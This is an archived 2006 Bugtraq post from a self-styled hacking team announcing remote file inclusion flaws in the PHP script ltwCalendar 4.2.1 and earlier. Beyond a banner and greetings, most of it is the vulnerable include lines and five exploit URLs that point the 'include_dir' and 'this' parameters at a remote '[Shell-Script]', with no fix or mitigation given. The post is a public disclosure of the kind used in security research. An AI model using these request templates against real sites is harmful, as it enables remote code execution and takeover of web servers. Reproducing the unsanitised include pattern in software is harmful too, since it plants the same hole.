[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061119124747.7346.qmail@securityfocus.com>
Date: 19 Nov 2006 12:47:47 -0000
From: the_3dit0r@...oo.com
To: bugtraq@...urityfocus.com
Subject: ltwCalendar => 4.2.1 Remote File Include Vulnerabilities
"""""""""""""""""""""""""""""""""""""""""""""""
""" :: :: ::::: :::: """
""" :: :: :: : :: """
""" :::: :: :: ::::: ::::: :::: """
""" :: :: ::: ::: :: :: :: :: :: """
""" :: :: :: : : ::::: :: :: :::: """
""" """
"""""""""""""""""""""""""""""""""""""""""""""""
Xmor$ DigitaL Hacking TeaM
# ltwCalendar => 4.2.1 Remote File Include Vulnerabilities
# Script.............. : ltwCalendar
# Discovered by.... : the_Edit0r
# Location .......... : Iran
# Class.............. : Remote
# Original Advisory : http://Www.Xmors.com ( Pablic ) http://Www.Xmors.net (pirv8)
# We ArE : Scorpiunix , KAMY4r , Sh3ll , SilliCONIC , Zer0.C0d3r
# D3vil_B0y_ir , Tornado , DarkAngel , Behbood
# <Spical TNX Irania Hackers :
# ( Aria-Security , Crouz , virangar ,DeltaHacking , Iranhackers
# Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev, Virangar )
# CodE :
require_once($ltw_config['include_dir'].'/ltw_classes.php');
----------&-----------
include_once($this->footer);
# Expl0its :
www.Site.coM/[path]/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=[Shell-Script]
Www.Site.com/[path]/ltw_install.php?ltw_config['include_dir']=[shell-Script]
Www.Site.coM/[path]/calendar.php?ltw_config['include_dir']=[Shell-Script]
www.Site.coM/[path]/pirvate/ltwdisplaylist.php?this=[Shell-Script]
www.Site.coM/[path]/pirvate/ltwdisplaymonth.php?this=[Shell-Script]
# Contact me : the_3dit0r[at]Yahoo[dot]coM
Powered by blists - more mailing lists